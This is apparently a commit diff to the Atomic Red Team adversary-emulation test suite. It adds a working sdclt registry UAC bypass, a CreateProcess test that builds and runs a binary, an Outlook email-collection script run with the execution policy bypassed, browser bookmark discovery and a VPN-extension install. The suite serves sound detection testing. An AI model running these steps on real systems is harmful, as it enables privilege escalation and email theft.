if (Test-Path #{exe_payload}) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
|
||||
Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\"
|
||||
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: |
|
||||
"#{exe_payload}"
|
||||
cleanup_command: |
|
||||
taskkill /f /im calculator.exe >nul 2>nul
|
||||
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
|
||||
del /Q "%temp%\T1027.zip" >nul 2>nul
|
||||
|
||||
Binary file not shown.
@@ -144,7 +144,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a rem
|
||||
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
|
||||
##### Check Prereq Commands:
|
||||
```cmd
|
||||
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
||||
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```cmd
|
||||
|
||||
@@ -101,7 +101,7 @@ atomic_tests:
|
||||
- description: |
|
||||
PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
|
||||
prereq_command: |
|
||||
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
||||
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
|
||||
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
|
||||
|
||||
@@ -24,6 +24,8 @@ Another bypass is possible through some Lateral Movement techniques if credentia
|
||||
|
||||
- [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories)
|
||||
|
||||
- [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -242,4 +244,43 @@ del "c:\testbypass.exe" >nul 2>nul
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
|
||||
Bypasses User Account Control using a fileless method, registry only.
|
||||
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
|
||||
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
|
||||
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
|
||||
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
|
||||
Start-Process -FilePath $env:windir\system32\sdclt.exe
|
||||
Start-Sleep -s 3
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -136,3 +136,29 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
|
||||
del "c:\testbypass.exe" >nul 2>nul
|
||||
|
||||
- name: Bypass UAC using sdclt DelegateExecute
|
||||
description: |
|
||||
Bypasses User Account Control using a fileless method, registry only.
|
||||
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
|
||||
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
|
||||
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
input_arguments:
|
||||
command.to.execute:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: cmd.exe /c notepad.exe
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
|
||||
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
|
||||
Start-Process -FilePath $env:windir\system32\sdclt.exe
|
||||
Start-Sleep -s 3
|
||||
cleanup_command: |
|
||||
Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
|
||||
|
||||
@@ -0,0 +1,53 @@
|
||||
# T1106 - Execution through API
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
|
||||
<blockquote>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
|
||||
|
||||
Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
|
||||
|
||||
* CreateProcessA() and CreateProcessW(),
|
||||
* CreateProcessAsUserA() and CreateProcessAsUserW(),
|
||||
* CreateProcessInternalA() and CreateProcessInternalW(),
|
||||
* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
|
||||
* LoadLibraryA() and LoadLibraryW(),
|
||||
* LoadLibraryExA() and LoadLibraryExW(),
|
||||
* LoadModule(),
|
||||
* LoadPackagedLibrary(),
|
||||
* WinExec(),
|
||||
* ShellExecuteA() and ShellExecuteW(),
|
||||
* ShellExecuteExA() and ShellExecuteExW()</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Execution through API - CreateProcess](#atomic-test-1---execution-through-api---createprocess)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Execution through API - CreateProcess
|
||||
Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1106\src\CreateProcess.cs|
|
||||
| output_file | Location of the payload | Path | %tmp%\T1106.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
|
||||
%tmp/T1106.exe
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,21 @@
|
||||
attack_technique: T1106
|
||||
display_name: T1106 -
|
||||
atomic_tests:
|
||||
- name: 'Execution through API - CreateProcess'
|
||||
description: Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Location of the CSharp source_file
|
||||
type: Path
|
||||
default: PathToAtomicsFolder\T1106\src\CreateProcess.cs
|
||||
output_file:
|
||||
description: Location of the payload
|
||||
type: Path
|
||||
default: '%tmp%\T1106.exe'
|
||||
executor:
|
||||
command: |
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
|
||||
%tmp/T1106.exe
|
||||
name: command_prompt
|
||||
@@ -0,0 +1,55 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace TestCode
|
||||
{
|
||||
class Program
|
||||
{
|
||||
[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
|
||||
private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation);
|
||||
|
||||
public struct STARTUPINFO
|
||||
{
|
||||
uint cb;
|
||||
IntPtr lpReserved;
|
||||
IntPtr lpDesktop;
|
||||
IntPtr lpTitle;
|
||||
uint dwX;
|
||||
uint dwY;
|
||||
uint dwXSize;
|
||||
uint dwYSize;
|
||||
uint dwXCountChars;
|
||||
uint dwYCountChars;
|
||||
uint dwFillAttributes;
|
||||
public uint dwFlags;
|
||||
public ushort wShowWindow;
|
||||
ushort cbReserved;
|
||||
IntPtr lpReserved2;
|
||||
IntPtr hStdInput;
|
||||
IntPtr hStdOutput;
|
||||
IntPtr hStdErr;
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential)]
|
||||
public struct PROCESS_INFORMATION
|
||||
{
|
||||
public IntPtr hProcess;
|
||||
public IntPtr hThread;
|
||||
public int dwProcessId;
|
||||
public int dwThreadId;
|
||||
}
|
||||
|
||||
public const uint CREATE_NEW_CONSOLE = 0x00000010;
|
||||
|
||||
|
||||
static void Main(string[] args)
|
||||
{
|
||||
uint flags = CREATE_NEW_CONSOLE;
|
||||
|
||||
STARTUPINFO startInfo = new STARTUPINFO();
|
||||
PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION();
|
||||
CreateProcess(@"C:\Windows\System32\cmd.exe", "/c calc.exe", (IntPtr)0, (IntPtr)0, false, flags, (IntPtr)0, (IntPtr)0, ref startInfo, out procInfo);
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
+24
-8
@@ -14,13 +14,16 @@ Any user or administrator within the organization (or adversary with valid crede
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
|
||||
- [Atomic Test #1 - Email Collection with PowerShell Get-Inbox](#atomic-test-1---email-collection-with-powershell-get-inbox)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - T1114 Email Collection with PowerShell
|
||||
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox
|
||||
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
|
||||
Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
|
||||
|
||||
Note: Outlook is required, but no email account necessary to produce artifacts.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -30,23 +33,36 @@ Search through local Outlook installation, extract mail, compress the contents,
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Output file path | String | $home\desktop\mail.csv|
|
||||
| file_path | File path for Get-Inbox.ps1 | String | PathToAtomicsFolder\T1114\src|
|
||||
| output_file | Output file path | String | $env:TEMP\mail.csv|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```cmd
|
||||
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
|
||||
```powershell
|
||||
powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file}
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
del #{output_file} >nul 2>&1
|
||||
```powershell
|
||||
Remove-Item #{output_file} -Force -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: Get-Inbox.ps1 must be located at #{file_path}
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -4,22 +4,39 @@ display_name: Email Collection
|
||||
attack_link: https://attack.mitre.org/wiki/Technique/T1114
|
||||
|
||||
atomic_tests:
|
||||
- name: T1114 Email Collection with PowerShell
|
||||
|
||||
- name: Email Collection with PowerShell Get-Inbox
|
||||
description: |
|
||||
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
|
||||
|
||||
Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
|
||||
|
||||
Note: Outlook is required, but no email account necessary to produce artifacts.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for Get-Inbox.ps1
|
||||
type: String
|
||||
default: PathToAtomicsFolder\T1114\src
|
||||
output_file:
|
||||
description: Output file path
|
||||
type: String
|
||||
default: $home\desktop\mail.csv
|
||||
default: $env:TEMP\mail.csv
|
||||
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Get-Inbox.ps1 must be located at #{file_path}
|
||||
prereq_command: |
|
||||
if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
|
||||
|
||||
executor:
|
||||
name: command_prompt
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
|
||||
powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file}
|
||||
|
||||
cleanup_command: |
|
||||
del #{output_file} >nul 2>&1
|
||||
Remove-Item #{output_file} -Force -ErrorAction Ignore
|
||||
|
||||
|
||||
@@ -12,6 +12,8 @@ Malicious extensions can be installed into a browser through malicious app store
|
||||
|
||||
- [Atomic Test #3 - Firefox](#atomic-test-3---firefox)
|
||||
|
||||
- [Atomic Test #4 - Edge Chromium Addon - VPN](#atomic-test-4---edge-chromium-addon---vpn)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -84,4 +86,27 @@ click "Load Temporary Add-on"
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Edge Chromium Addon - VPN
|
||||
Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store.
|
||||
|
||||
**Supported Platforms:** Windows, macOS
|
||||
|
||||
|
||||
|
||||
|
||||
#### Run it with these steps!
|
||||
1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj
|
||||
in Edge Chromium
|
||||
|
||||
2. Click 'Get'
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -52,3 +52,23 @@ atomic_tests:
|
||||
2. Navigate to [manifest.json](./src/manifest.json)
|
||||
|
||||
3. Then click 'Open'
|
||||
|
||||
- name: Edge Chromium Addon - VPN
|
||||
description: |
|
||||
Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store.
|
||||
supported_platforms:
|
||||
- windows
|
||||
- macos
|
||||
executor:
|
||||
name: manual
|
||||
steps: |
|
||||
1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj
|
||||
in Edge Chromium
|
||||
|
||||
2. Click 'Get'
|
||||
cleanup:
|
||||
1. Navigate to "..." menu in top right of browser and select.
|
||||
|
||||
2. In drop down, click on "Extensions".
|
||||
|
||||
3. Remove the Extension.
|
||||
|
||||
+30
-3
@@ -16,7 +16,9 @@ Specific storage locations vary based on platform and/or application, but browse
|
||||
|
||||
- [Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell](#atomic-test-4---list-google-chrome-bookmarks-on-windows-with-powershell)
|
||||
|
||||
- [Atomic Test #5 - List Google Chrome Bookmarks on Windows with command prompt.](#atomic-test-5---list-google-chrome-bookmarks-on-windows-with-command-prompt)
|
||||
- [Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.](#atomic-test-5---list-google-chrome--edge-chromium-bookmarks-on-windows-with-command-prompt)
|
||||
|
||||
- [Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt.](#atomic-test-6---list-mozilla-firefox-bookmarks-on-windows-with-command-prompt)
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -148,8 +150,8 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - List Google Chrome Bookmarks on Windows with command prompt.
|
||||
Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
|
||||
Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -170,4 +172,29 @@ where /R C:\Users\ Bookmarks
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt.
|
||||
Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
where /R C:\Users\ places.sqlite
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -73,9 +73,9 @@ atomic_tests:
|
||||
command: |
|
||||
Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force
|
||||
|
||||
- name: List Google Chrome Bookmarks on Windows with command prompt.
|
||||
- name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
|
||||
description: |
|
||||
Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
|
||||
supported_platforms:
|
||||
@@ -85,3 +85,16 @@ atomic_tests:
|
||||
name: command_prompt
|
||||
command: |
|
||||
where /R C:\Users\ Bookmarks
|
||||
|
||||
- name: List Mozilla Firefox bookmarks on Windows with command prompt.
|
||||
description: |
|
||||
Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: |
|
||||
where /R C:\Users\ places.sqlite
|
||||
|
||||
@@ -100,7 +100,7 @@ class AtomicRedTeamDocs
|
||||
ATTACK_API.ordered_tactic_to_technique_matrix(only_platform: only_platform).each do |row_of_techniques|
|
||||
row_values = row_of_techniques.collect do |technique|
|
||||
if technique
|
||||
ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: false)
|
||||
ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: false, only_platform: only_platform)
|
||||
end
|
||||
end
|
||||
result += "| #{row_values.join(' | ')} |\n"
|
||||
@@ -120,7 +120,7 @@ class AtomicRedTeamDocs
|
||||
ATTACK_API.techniques_by_tactic(only_platform: only_platform).each do |tactic, techniques|
|
||||
result += "# #{tactic}\n"
|
||||
techniques.each do |technique|
|
||||
result += "- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, link_new_to_contrib: true)}\n"
|
||||
result += "- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, only_platform: only_platform)}\n"
|
||||
ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|
|
||||
next unless atomic_test['supported_platforms'].any? {|platform| platform.downcase =~ only_platform}
|
||||
|
||||
|
||||
Reference in New Issue
Block a user